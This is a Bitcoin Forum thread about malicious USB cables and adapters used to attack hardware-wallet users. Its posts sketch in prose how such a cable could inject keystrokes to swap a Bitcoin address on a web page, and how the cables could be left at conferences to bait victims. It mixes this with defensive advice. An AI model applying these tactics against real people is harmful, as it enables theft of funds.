Bitcoin Forum
November 15, 2024, 05:16:26 AM *
News: Check out the artwork 1Dq created to commemorate this forum's 15th anniversary
 
   Home   Help Search Login Register More  
Pages: [1] 2 3 »  All
  Print  
Author Topic: Be careful what you plug your hardware wallet into your PC with  (Read 508 times)
DaveF (OP)
Legendary
*
Offline Offline

Activity: 3654
Merit: 6671


Crypto Swap Exchange


View Profile WWW
March 24, 2022, 03:47:59 AM
Merited by PrivacyG (5), Welsh (4), o_e_l_e_o (4), vapourminer (3), dkbit98 (3), Pmalek (1)
 #1

https://hak5.org/products/omg-adapter

Been working with someone and we think we might have a MITM attack working against a certain hardware wallet.

For now I can't talk about it, but I can say (and have said in the past) don't trust anything you plug into your PC to verify anything else.
With more and more laptops only coming with the USB C connector and more and more people needing the C to A adapter, it's going to be much easier to drop compromised cables like this into the environment.

More in a few weeks (hopefully).

-Dave

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
jackg
Copper Member
Legendary
*
Offline Offline

Activity: 2856
Merit: 3071


https://bit.ly/387FXHi lightning theory


View Profile
March 24, 2022, 05:31:57 AM
Merited by DaveF (2)
 #2

Normally to recover a wallet you'd also have to put in a mnemonic, which would be sent down the cable too so there's added reason to make sure you can trust your connectors.

Do you know how easy the vulnerability you found would be to patch - is it likely to not remain one for long or is it quite well embedded (feel free to wait on answering this)?
witcher_sense
Legendary
*
Offline Offline

Activity: 2450
Merit: 4415


🔐BitcoinMessage.Tools🔑


View Profile WWW
March 24, 2022, 08:02:32 AM
Merited by vapourminer (3), DaveF (2), ABCbits (1), Pmalek (1)
 #3

https://hak5.org/products/omg-adapter

Been working with someone and we think we might have a MITM attack working against a certain hardware wallet.

For now I can't talk about it, but I can say (and have said in the past) don't trust anything you plug into your PC to verify anything else.
With more and more laptops only coming with the USB C connector and more and more people needing the C to A adapter, it's going to be much easier to drop compromised cables like this into the environment.

More in a few weeks (hopefully).

-Dave
Cables and adapters able to steal user's data have been around for a while, here is some articles regarding this topic:
https://www.vice.com/en/article/k789me/omg-cables-keylogger-usbc-lightning
https://plugavel.com/3025/tech/this-usb-c-cable-can-steal-your-data/
https://fossbytes.com/not-so-innocent-usb-cable-uses-wifi-to-hack-your-device/
https://fossbytes.com/usbharpoon-usb-cable-malware-transfer/
https://shop.hak5.org/collections/mischief-gadgets/products/o-mg-cable-usb-a


With these USB cables, hackers can steal passwords and record pretty much everything you type with your keyboard, inject malicious payloads, reflash the system's firmware, remotely execute different commands, etc. However, I have never heard that any hardware wallet has been hacked this way. Hardware wallets generally transfer neither private keys nor any other sensitive information through a USB connection, so there is nothing hackers can intercept via cables like this. I don't know maybe it is possible to install malicious custom firmware on the device which will allow for seed extraction. They won't extract a passphrase though, because it is not stored anywhere and usually typed on a device itself.

Normally to recover a wallet you'd also have to put in a mnemonic, which would be sent down the cable too so there's added reason to make sure you can trust your connectors.
Normally, the entire recovery process takes place or should take on a device itself, typing your seed on a computer is a terrible practice in principle.

As an example: https://wiki.trezor.io/User_manual:Recovery

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
NeuroticFish
Legendary
*
Offline Offline

Activity: 3864
Merit: 6591


Looking for campaign manager? Contact icopress!


View Profile
March 24, 2022, 08:20:37 AM
Merited by DaveF (2)
 #4

a MITM attack working against a certain hardware wallet.

Since the only valid uses for a cable are for signing transactions and maybe for charging, I'd guess that the transaction info going to the HW could be altered with the "right" cable (wouldn't such a cable be too bulky?!)
But even then, such an attack could work only if one doesn't pay attention what the HW screen shows before signing (unless it's Jack's screenless future HW lol).

However, I guess that the validation (or not) for my theory may have to wait "a few weeks"...

███████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████

███████████████████████
.
BC.GAME
▄▄▀▀▀▀▀▀▀▄▄
▄▀▀░▄██▀░▀██▄░▀▀▄
▄▀░▐▀▄░▀░░▀░░▀░▄▀▌░▀▄
▄▀▄█▐░▀▄▀▀▀▀▀▄▀░▌█▄▀▄
▄▀░▀░░█░▄███████▄░█░░▀░▀▄
█░█░▀░█████████████░▀░█░█
█░██░▀█▀▀█▄▄█▀▀█▀░██░█
█░█▀██░█▀▀██▀▀█░██▀█░█
▀▄▀██░░░▀▀▄▌▐▄▀▀░░░██▀▄▀
▀▄▀██░░▄░▀▄█▄▀░▄░░██▀▄▀
▀▄░▀█░▄▄▄░▀░▄▄▄░█▀░▄▀
▀▄▄▀▀███▄███▀▀▄▄▀
██████▄▄▄▄▄▄▄██████
.
..CASINO....SPORTS....RACING..


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
PrivacyG
Legendary
*
Offline Offline

Activity: 980
Merit: 2004


Crypto Swap Exchange


View Profile
March 24, 2022, 08:28:45 AM
Merited by vapourminer (2), DaveF (2), m2017 (1)
 #5

(wouldn't such a cable be too bulky?!)
I just wanted to ask this.  Is there no way to tell a compromised cable from a non malicious one?  One thing I never do is use any cable other than those I have always trusted or that came with the product.  I understand it is possible to be targeted and have a cable compromised but besides what Neurotic's scenario of an attack, I do not think there is any way you could be attacked?

If there was a way to do something malicious due to the cable being compromised, then I suppose it would also be possible to attack a Hardware Wallet through any computer infected with the right malware.  Right?

-
Regards,
PrivacyG

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
NeuroticFish
Legendary
*
Offline Offline

Activity: 3864
Merit: 6591


Looking for campaign manager? Contact icopress!


View Profile
March 24, 2022, 08:43:09 AM
Merited by vapourminer (2), DaveF (2)
 #6

(wouldn't such a cable be too bulky?!)
I just wanted to ask this.  Is there no way to tell a compromised cable from a non malicious one?

I remembered that I've seen here in the past a discussion about malicious cables and I've found it: https://bitcointalk.org/index.php?topic=5186863
It looks like the cable is not really different from normal ones; at least no visible difference. So it's a real problem.

███████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████

███████████████████████
.
BC.GAME
▄▄▀▀▀▀▀▀▀▄▄
▄▀▀░▄██▀░▀██▄░▀▀▄
▄▀░▐▀▄░▀░░▀░░▀░▄▀▌░▀▄
▄▀▄█▐░▀▄▀▀▀▀▀▄▀░▌█▄▀▄
▄▀░▀░░█░▄███████▄░█░░▀░▀▄
█░█░▀░█████████████░▀░█░█
█░██░▀█▀▀█▄▄█▀▀█▀░██░█
█░█▀██░█▀▀██▀▀█░██▀█░█
▀▄▀██░░░▀▀▄▌▐▄▀▀░░░██▀▄▀
▀▄▀██░░▄░▀▄█▄▀░▄░░██▀▄▀
▀▄░▀█░▄▄▄░▀░▄▄▄░█▀░▄▀
▀▄▄▀▀███▄███▀▀▄▄▀
██████▄▄▄▄▄▄▄██████
.
..CASINO....SPORTS....RACING..


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
PawGo
Legendary
*
Offline Offline

Activity: 952
Merit: 1385


View Profile
March 24, 2022, 10:52:50 AM
Merited by vapourminer (2), DaveF (2)
 #7

https://hak5.org/products/omg-adapter

Been working with someone and we think we might have a MITM attack working against a certain hardware wallet.


Very interesting, I can't wait.
It reminds me the famous "USB Ninja" project : https://usbninja.com or USBHarpoon.
And makes me thing about all that people who connects their smartphones to "free chargers".

DaveF (OP)
Legendary
*
Offline Offline

Activity: 3654
Merit: 6671


Crypto Swap Exchange


View Profile WWW
March 24, 2022, 11:43:50 AM
Last edit: March 24, 2022, 12:47:06 PM by DaveF
Merited by vapourminer (2), NeuroticFish (2), hugeblack (2)
 #8

Normally to recover a wallet you'd also have to put in a mnemonic, which would be sent down the cable too so there's added reason to make sure you can trust your connectors.

Do you know how easy the vulnerability you found would be to patch - is it likely to not remain one for long or is it quite well embedded (feel free to wait on answering this)?

I don't know, I'm a network and hardware guy. I got about 20% of the way into his explanation before my eyes glazed over.

a MITM attack working against a certain hardware wallet.

Since the only valid uses for a cable are for signing transactions and maybe for charging, I'd guess that the transaction info going to the HW could be altered with the "right" cable (wouldn't such a cable be too bulky?!)
But even then, such an attack could work only if one doesn't pay attention what the HW screen shows before signing (unless it's Jack's screenless future HW lol).

However, I guess that the validation (or not) for my theory may have to wait "a few weeks"...

(wouldn't such a cable be too bulky?!)
I just wanted to ask this.  Is there no way to tell a compromised cable from a non malicious one?  One thing I never do is use any cable other than those I have always trusted or that came with the product.  I understand it is possible to be targeted and have a cable compromised but besides what Neurotic's scenario of an attack, I do not think there is any way you could be attacked?

If there was a way to do something malicious due to the cable being compromised, then I suppose it would also be possible to attack a Hardware Wallet through any computer infected with the right malware.  Right?

-
Regards,
PrivacyG

Actually, the screen shows on the device shows the correct information as does the screen of your PC. Remember not only can it record keyboard strokes it can play them back. As in edit webpages. What it can't do at this point is generate QR codes / graphics.

Not only do the cables look the same, since USB C to A cables are still new to a lot of people they would not know the difference anyway.

This is one of the few times BIP 70 would have actually been useful.

-Dave

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
dkbit98
Legendary
*
Offline Offline

Activity: 2422
Merit: 7572



View Profile WWW
March 24, 2022, 01:51:03 PM
Merited by vapourminer (2), DaveF (2)
 #9

Been working with someone and we think we might have a MITM attack working against a certain hardware wallet.
Please try doing that with airgapped hardware wallets like Passport or Keystone that don't use any cable connection with computer... I can't wait to see the results Smiley

With more and more laptops only coming with the USB C connector and more and more people needing the C to A adapter, it's going to be much easier to drop compromised cables like this into the environment.
I am not a big fan of using USB-C as universal USB connector for all devices but it looks like we are going in that direction.
They are even using same usb type c for charging devices like laptops and smartphones, and I've seen that making problems on some laptops, because people confuse power cable with usb and they blow up the board.
It's not that hard to imagine some malware cables could target hardware wallet users, that is why I would only use original cables made by manufacturers.

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
DaveF (OP)
Legendary
*
Offline Offline

Activity: 3654
Merit: 6671


Crypto Swap Exchange


View Profile WWW
March 24, 2022, 04:20:04 PM
Merited by vapourminer (2)
 #10

Been working with someone and we think we might have a MITM attack working against a certain hardware wallet.
Please try doing that with airgapped hardware wallets like Passport or Keystone that don't use any cable connection with computer... I can't wait to see the results Smiley

With more and more laptops only coming with the USB C connector and more and more people needing the C to A adapter, it's going to be much easier to drop compromised cables like this into the environment.
I am not a big fan of using USB-C as universal USB connector for all devices but it looks like we are going in that direction.
They are even using same usb type c for charging devices like laptops and smartphones, and I've seen that making problems on some laptops, because people confuse power cable with usb and they blow up the board.
It's not that hard to imagine some malware cables could target hardware wallet users, that is why I would only use original cables made by manufacturers.


It will do those easier if it's just putting in an address. It's actually trivial.
Remember it not just a key logger, it can also run apps and put stuff into the PC.
So if he can get to the page inspector in chrome (or whatever it is in that particular browser) he can modify a BTC address at a known location. Since it's always in the same space here: https://bitcointalk.org/index.php?action=credit;promote it's a known spot in code that can change to his address. For now it can only change the address QR codes cannot be done (yet)

The trick with the HW wallet is that it's breaking the encryption loop with their app.
As I said WAY over my head in programming.

As for only using the original cables, it's like you said USB A on a lot of machines is going away till they give you a cable that is USB C you need one of these adapter things.

-Dave

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
jackg
Copper Member
Legendary
*
Offline Offline

Activity: 2856
Merit: 3071


https://bit.ly/387FXHi lightning theory


View Profile
March 24, 2022, 05:33:14 PM
 #11

Normally to recover a wallet you'd also have to put in a mnemonic, which would be sent down the cable too so there's added reason to make sure you can trust your connectors.
Normally, the entire recovery process takes place or should take on a device itself, typing your seed on a computer is a terrible practice in principle.

As an example: https://wiki.trezor.io/User_manual:Recovery

Ohhhhh it's been updated! Afaik the last time I tried to recover my trezor it asked me to input the mnemonic in a different order (based on what the device said and asked for some extra words but I wasn't sure how much I trusted that - this was 3 or 4 years ago).
m2017
Legendary
*
Offline Offline

Activity: 2002
Merit: 1402


Playbet.io - Crypto Casino and Sportsbook


View Profile
March 24, 2022, 05:56:59 PM
 #12

And makes me thing about all that people who connects their smartphones to "free chargers".
Wow. But really, this is a great way to get malware on your phone. In modern times, in addition to the usual software hygiene of your device, it will include "do not charge in suspicious places and with unfamiliar cables."

With more and more laptops only coming with the USB C connector and more and more people needing the C to A adapter, it's going to be much easier to drop compromised cables like this into the environment.
I am not a big fan of using USB-C as universal USB connector for all devices but it looks like we are going in that direction.
Looks like there's a new reason to keep an extra PC/laptop to interact with crypto. Of course, with USB type A, even then no adapters are required. This means that the threat described in this topic will be excluded.

More and more manufacturers are refusing to use USB A in their devices, and over time this will lead to a shortage of such devices. The market for used devices will not be endless either.

███████████████
█████████████████████
██████▄▄███████████████
██████▐████▄▄████████████
██████▐██▀▀▀██▄▄█████████
████████▌█████▀██▄▄██████
██████████████████▌█████
█████████████▀▄██▀▀██████
██████▐██▄▄█▌███████████
██████▐████▀█████████████
██████▀▀███████████████
█████████████████████
███████████████

.... ..Playbet.io..Casino & Sportsbook.....Grab up to  BTC + 800 Free Spins........
████████████████████████████████████████
██████████████████████████████████████████████
██████▄▄████████████████████████████████████████
██████▐████▄▄█████████████████████████████████████
██████▐██▀▀▀██▄▄██████████████████████████████████
████████▌█████▀██▄▄█████▄███▄███▄███▄█████████████
██████████████████▌████▀░░██▌██▄▄▄██████████████
█████████████▀▄██▀▀█████▄░░██▌██▄░░▄▄████▄███████
██████▐██▄▄█▌██████████▀███▀███▀███▀███▀█████████
██████▐████▀██████████████████████████████████████
██████▀▀████████████████████████████████████████
██████████████████████████████████████████████
████████████████████████████████████████
NeuroticFish
Legendary
*
Offline Offline

Activity: 3864
Merit: 6591


Looking for campaign manager? Contact icopress!


View Profile
March 24, 2022, 06:33:03 PM
Last edit: May 14, 2023, 02:59:11 PM by NeuroticFish
 #13

Looks like there's a new reason to keep an extra PC/laptop to interact with crypto. Of course, with USB type A, even then no adapters are required. This means that the threat described in this topic will be excluded.

USB A can easily handle exploits for PC/laptops, see the link from my other post here.
So by making the wrong assumptions, instead of protecting one, you can end up getting malware on the other.

More and more manufacturers are refusing to use USB A in their devices, and over time this will lead to a shortage of such devices. The market for used devices will not be endless either.

This doesn't really make sense. USB A is still widely used for PCs, I don't think they'll get no-longer-produced too soon. And, if you want to, you can easily buy cheap and straightforwards adapters from USB A to micro USB or USB-C like this one:


███████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████

███████████████████████
.
BC.GAME
▄▄▀▀▀▀▀▀▀▄▄
▄▀▀░▄██▀░▀██▄░▀▀▄
▄▀░▐▀▄░▀░░▀░░▀░▄▀▌░▀▄
▄▀▄█▐░▀▄▀▀▀▀▀▄▀░▌█▄▀▄
▄▀░▀░░█░▄███████▄░█░░▀░▀▄
█░█░▀░█████████████░▀░█░█
█░██░▀█▀▀█▄▄█▀▀█▀░██░█
█░█▀██░█▀▀██▀▀█░██▀█░█
▀▄▀██░░░▀▀▄▌▐▄▀▀░░░██▀▄▀
▀▄▀██░░▄░▀▄█▄▀░▄░░██▀▄▀
▀▄░▀█░▄▄▄░▀░▄▄▄░█▀░▄▀
▀▄▄▀▀███▄███▀▀▄▄▀
██████▄▄▄▄▄▄▄██████
.
..CASINO....SPORTS....RACING..


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
DaveF (OP)
Legendary
*
Offline Offline

Activity: 3654
Merit: 6671


Crypto Swap Exchange


View Profile WWW
March 24, 2022, 06:39:07 PM
Merited by NeuroticFish (2)
 #14

Looks like there's a new reason to keep an extra PC/laptop to interact with crypto. Of course, with USB type A, even then no adapters are required. This means that the threat described in this topic will be excluded.

USB A can easily handle exploits for PC/laptops, see the link from my other post here.
So by making the wrong assumptions, instead of protecting one, you can end up getting malware on the other.

More and more manufacturers are refusing to use USB A in their devices, and over time this will lead to a shortage of such devices. The market for used devices will not be endless either.

This doesn't really make sense. USB A is still widely used for PCs, I don't think they'll get no-longer-produced too soon. And, if you want to, you can easily buy cheap and straightforwards adapters from USB A to micro USB or USB-C like this one:



<Cough> MacBooks </cough> And any of the ultra portable PC ones (Microsoft surface, etc.) are all USB A only.

Having one of those small adapters is nice. But people are people, and people forget things.
If I drop a few of those cables around a show like BlackHat or Defcon probably nobody is going to plug them into anything.
Leave a few around Bitcoin Miami and you could probably get someone to plug them in.

Buy a few dozen (yes it's expensive) but then put a logo on for something that looks like a giveaway and you know people are going to use it....

-Dave

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
NeuroticFish
Legendary
*
Offline Offline

Activity: 3864
Merit: 6591


Looking for campaign manager? Contact icopress!


View Profile
March 24, 2022, 06:42:51 PM
 #15

Leave a few around Bitcoin Miami and you could probably get someone to plug them in.

Well, we know that most aren't into Bitcoin because of the tech Wink
And then I can guess the horror (and the bad publicity) if such exploit indeed happens at a big Bitcoin event Grin

███████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████

███████████████████████
.
BC.GAME
▄▄▀▀▀▀▀▀▀▄▄
▄▀▀░▄██▀░▀██▄░▀▀▄
▄▀░▐▀▄░▀░░▀░░▀░▄▀▌░▀▄
▄▀▄█▐░▀▄▀▀▀▀▀▄▀░▌█▄▀▄
▄▀░▀░░█░▄███████▄░█░░▀░▀▄
█░█░▀░█████████████░▀░█░█
█░██░▀█▀▀█▄▄█▀▀█▀░██░█
█░█▀██░█▀▀██▀▀█░██▀█░█
▀▄▀██░░░▀▀▄▌▐▄▀▀░░░██▀▄▀
▀▄▀██░░▄░▀▄█▄▀░▄░░██▀▄▀
▀▄░▀█░▄▄▄░▀░▄▄▄░█▀░▄▀
▀▄▄▀▀███▄███▀▀▄▄▀
██████▄▄▄▄▄▄▄██████
.
..CASINO....SPORTS....RACING..


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
n0nce
Hero Member
*****
Offline Offline

Activity: 896
Merit: 5918


not your keys, not your coins!


View Profile WWW
March 25, 2022, 12:44:24 AM
 #16

Having one of those small adapters is nice. But people are people, and people forget things.
If I drop a few of those cables around a show like BlackHat or Defcon probably nobody is going to plug them into anything.
Leave a few around Bitcoin Miami and you could probably get someone to plug them in.

Buy a few dozen (yes it's expensive) but then put a logo on for something that looks like a giveaway and you know people are going to use it....
You'd be surprised how often you do find USB freebies at conferences such as BlackHat and similar. Grin
Infecting PCs using free USB devices is a very common practice and even part of the toolbelt of lots of professional pentesting companies.

Until now, I was under the impression that if you only transmit PSBTs through USB, a simple corrupting / replacing attack would definitely lead to the wrong address showing on the hardware device's screen.
I'm very excited to see how you're going to circumvent this for hacking USB hardware wallets, though!

It will do those easier if it's just putting in an address. It's actually trivial.
Remember it not just a key logger, it can also run apps and put stuff into the PC.
So if he can get to the page inspector in chrome (or whatever it is in that particular browser) he can modify a BTC address at a known location. Since it's always in the same space here: https://bitcointalk.org/index.php?action=credit;promote it's a known spot in code that can change to his address. For now it can only change the address QR codes cannot be done (yet)
From this text it appears to me that you're just replacing the address shown on screen with a malicious one as well as sending that address to the hardware device; thus the user sees the same one on both devices. That's quite smart and should be relatively simple to do, sounds good to me!

The trick with the HW wallet is that it's breaking the encryption loop with their app.
I don't understand this however. You're breaking encryption now? Why?

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
DaveF (OP)
Legendary
*
Offline Offline

Activity: 3654
Merit: 6671


Crypto Swap Exchange


View Profile WWW
March 25, 2022, 02:56:11 AM
Merited by vapourminer (2)
 #17

I don't understand this however. You're breaking encryption now? Why?

Once again, I'm not he is :-)

But he is not sending the bad address to the device, that is the issue. The user can copy / paste the info, but leaving the manufacturer out of it, there is a browser plug in they use to talk to the hardware wallet.

As of now THAT is not fooled by the find / replace on the web page since it sees it as it loads or something. Explained to me but as I said I lost it after the 1st few minutes of the explanation.

Just so you know how dangerous devices like this are here are just the PUBLIC DOWNLOADABLE things you can load on it.
https://hak5.org/blogs/payloads  (7 pages of fun)

-Dave


█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
n0nce
Hero Member
*****
Offline Offline

Activity: 896
Merit: 5918


not your keys, not your coins!


View Profile WWW
March 25, 2022, 12:15:19 PM
 #18

I don't understand this however. You're breaking encryption now? Why?

Once again, I'm not he is :-)

But he is not sending the bad address to the device, that is the issue. The user can copy / paste the info, but leaving the manufacturer out of it, there is a browser plug in they use to talk to the hardware wallet.

As of now THAT is not fooled by the find / replace on the web page since it sees it as it loads or something. Explained to me but as I said I lost it after the 1st few minutes of the explanation.

Just so you know how dangerous devices like this are here are just the PUBLIC DOWNLOADABLE things you can load on it.
https://hak5.org/blogs/payloads  (7 pages of fun)
Honestly, I don't get why the attacker would 'talk to the hardware wallet' directly; it would be the most trivial and easy thing, if you have a way to manipulate webpages locally, to just replace the address, so the user himself copies the 'bad address' to the wallet and signs a transaction that spends money to it. This should also work pretty 'universally' against a variety of wallets, whereas other methods might be restricted to specific manufacturers / wallets only.
But I'll just wait and see once more information can be released publicly; no hurry. Wink

Oh, I know about these devices, they're really good, I used them in the past, too.

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
Pmalek
Legendary
*
Offline Offline

Activity: 2954
Merit: 7554


Playgram - The Telegram Casino


View Profile
March 26, 2022, 08:36:02 AM
 #19

Depending on how severe this vulnerability or bug is, will the two of you reveal and discuss this with the manufacturing company first before releasing any details to the public? I think you should and I hope you will. There might be a bug bounty in it for you if you do. But more importantly, you won't be making life easier for those who want to destroy everything and steal money from people.   

▄▄███████▄▄███████
